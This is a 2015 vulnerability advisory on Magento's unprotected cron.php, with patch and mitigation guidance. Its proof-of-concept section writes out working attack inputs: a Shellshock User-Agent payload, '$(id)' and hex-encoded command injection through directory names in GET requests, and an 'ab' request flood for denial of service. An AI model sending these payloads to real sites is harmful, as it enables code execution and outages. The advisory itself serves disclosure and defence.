1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 |
# Exploit Title: eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS) # Date: 06.11.2015 # Exploit Author: Dawid Golunski # Vendor Homepage: http://magento.com # Version: eBay Magento CE <= 1.9.2.1 / Magento EE <=1.14.2.1 # Tested on: Linux # Magento reference ID: APPSEC-1045 ============================================= - Release date: 06.11.2015 - Discovered by: Dawid Golunski - Severity: Medium - eBay Magento ref.: APPSEC-1037 ============================================= I. VULNERABILITY ------------------------- eBay Magento CE <= 1.9.2.1Unrestricted Cron Script (Potential Code Execution / DoS) eBay Magento EE <= 1.14.2.1 II. BACKGROUND ------------------------- - eBay Magento eCommerce http://magento.com/ "More than 240,000 merchants worldwide put their trust in our eCommerce software. Magento's eCommerce platform gives you the tools you need to attract more prospects, sell more products, and make more money. It's what we do. We're owned by eBay, so you know we're eCommerce experts" III. INTRODUCTION ------------------------- Default installation of ebay Magento eCommerce software comes with a cron.php which allows to manage scheduled tasks. The script is not protected by default and can be publicly accessed. The publicly exposed cron script poses some potential risks such as exploitation of the well known shellshock vulnerability on unpatched systems leading to code execution. The same script has another potential command execution vector that stems from inproper data sanitisation passed to a shell_exec function. Apart from the code execution vectors, the script could potentially be used to perform a DoS attack due to lack of locking mechanism that prevents the script from spawning multiple instances of other helper shell scripts. IV. DESCRIPTION ------------------------- A) Shellshock vector Magento cron.php script includes a command execution function that looks as follows: -----[ magento/cron.php ]----- ... try { if (stripos(PHP_OS, 'win') === false) { $options = getopt('m::'); if (isset($options['m'])) { if ($options['m'] == 'always') { $cronMode = 'always'; } elseif ($options['m'] == 'default') { $cronMode = 'default'; } else { Mage::throwException('Unrecognized cron mode was defined'); } } else if (!$isShellDisabled) { $fileName = basename(__FILE__); $baseDir = dirname(__FILE__); shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &"); shell_exec("/bin/sh $baseDir/cron.sh $fileName -malways 1 > /dev/null 2>&1 &"); exit; } ... ------------------------------ As can be seen, the script runs shell_exec() that loads /bin/sh program which is usually a symlink to /bin/bash. Although the shellshock vulnerability should be patched, there have been reports of linux distributions that insufficiently patched the issue and remained vulnerable. Magento's cron.php could be used as exploit the shellshock vulnerability on unpatched systems which host Magento in CGI mode (which can be easily enabled via .htaccess file provided with Magento). B) Command injection The script fails to sanitise the input data coming from $baseDir variable. Input passed to shell execution functions should always be sanitised with escapeshellcmd / escapeshellarg PHP functions. Although not exploitable on its own, the lack of escaping could allow to inject some system commands on Magento hosting platforms which have a feature to create backups of directories with a specified name within the document root. If the provided hosting control panel allows to specify names of such backups, a user could potentially inject some malicious data within the directory name which could result in a command injection when cron.php is run from the backup directory. The command would execute upon the shell_exec() receiving the malicious data injected with the help of the $baseDir variable. C) Denial of Service As the script lacks any access control and a locking mechanism, it is possible to remotely request cron.php multiple times in order to make it spawn multiple instances of the cron.sh script. As a single execution of the script results in 2 cron.sh spawned processes, plus a separate CGI process (if website runs as CGI), an attacker could potentially overload the Magento site with multiple requests and create a Denial of Service condition by process exhaustion etc. V. PROOF OF CONCEPT ------------------------- A) Shellshock vector exploit Sending the following request to a CGI-enabled Magento site: GET /magento/cron.php HTTP/1.1 Host: victim_magento_site User-Agent: () { :; } ; /bin/touch /tmp/magento_cron_hack will result in a command execution on shellshock affected systems. The resul of the above would be: victim$ ls -l /tmp/magento_cron_hack -rw-rw-rw- 1 www-data www-data 0 Jul 26 09:08 /tmp/magento_cron_hack B) Command injection Due to lack of sanitisation, if a malicious Magento user had access to a backup facility, he could potenially create a backup of the magento directory with a command within the name , e.g.: $(id) The user could then request the cron.php script via the following request: GET /magento/$(id)/cron.php HTTP/1.1 Host: victim_magento_site Because of the shell_exec() function in the quoted sourcecode of cron.php: --- $baseDir = dirname(__FILE__); shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &"); --- it would cause the cron.php script to run the following command: /bin/sh /var/www/magento/$(id)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 & The command would run id program as soon as bash command expansion syntax of $() got evaluated. An attacker could also run more complex commands, by hex encoding disallowed characters within directory names (such as '/' directory separator). For example, he could run the command: touch /tmp/magento_exec by encoding it as follows: echo 'touch /tmp/magento_exec' | hexdump -v -e '"\\\\\\""x" 1/1 "%02x" ""' ${1} \\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63 He could then execute it via a GET request of: GET /magento/$(<code>echo%20-e%20\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63</code>)/exec.php HTTP/1.1 which would execute: /bin/sh /var/www/magento/exec_poc/$(<code>echo -e \\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63</code>)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 & resulting in creating the PoC file: victim$ ls -l /tmp/magento_exec -rw-r--r-- 1 www-data www-data 0 Jul 26 11:20 /tmp/magento_exec C) Denial of Service By sending multiple requests to cron.php, for example using apache benchmark tool: attacker$ ab -n 500 -c 30http://victim_magento_site/magento/cron.php attacker could exploit the lack of locking to spawn numerous processes, potentially leading to resource exhaustion and a DoS condition. The above command would result in creating multiple instances of the cron.php/cron.sh scripts on the target host: ... www-data55290.21.3 2877566872 ?Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault www-data55310.21.1 2880005848 ?Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault www-data55330.21.2 2880006432 ?Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data55350.31.2 2880006484 ?Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data55370.31.5 2887687740 ?Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data55390.31.3 2875246956 ?Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data55410.31.4 2887687168 ?Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data55430.31.4 2882887188 ?Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data55460.31.4 2885127188 ?Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways www-data58850.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58860.00.017880 456 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58870.00.017880 456 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58880.00.017880 440 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58890.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58900.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58910.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data58990.00.017880 496 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data59000.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data59010.00.017880 496 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1 www-data59040.00.017880 500 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data59070.00.017880 496 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1 www-data59090.00.017880 500 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1 www-data59100.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1 www-data59120.00.017880 464 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 www-data59130.00.017880 460 ?S10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1 ... VI. BUSINESS IMPACT ------------------------- The issue has been rated as medium. Depending on the Magento hosting features and applied patches code execution could be possible which would increase the risks. VII. SYSTEMS AFFECTED ------------------------- The latest version of eBay Magento CE (1.9.2.1) was confirmed to contain the vulnerable cron.php script. The Magento EE versions also contain this problem according to the vendor's advisory. VIII. SOLUTION ------------------------- eBay Magento assigned this issue the ID of APPSEC-1037 and supplied a patch for it within the SUPEE-6788 patch bundle available on the official website. The patch adds sanitisation functions around the shell_exec() code however the cron script remains publicly accessible. It is recommended to protect the cron script by other means. For example, the script could require a key supplied together with a GET request to proceed with the execution which is commonly used with other major open source solutions. The easiest way would also be restricting acess to the script to only certain IPs or localhost within the web server configuration. IX. REFERENCES ------------------------- http://legalhackers.com/advisories/Magento-Unrestricted-Cron-Script-Vulnerability.txt Oficial eBay Magento website: http://magento.com/ Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML Functionality Using Multibyte Payloads' (APPSEC-1037) is available at: https://magento.com/security/patches/supee-6788 X. CREDITS ------------------------- The vulnerabilities have been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- Nov 6th, 2015:Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. |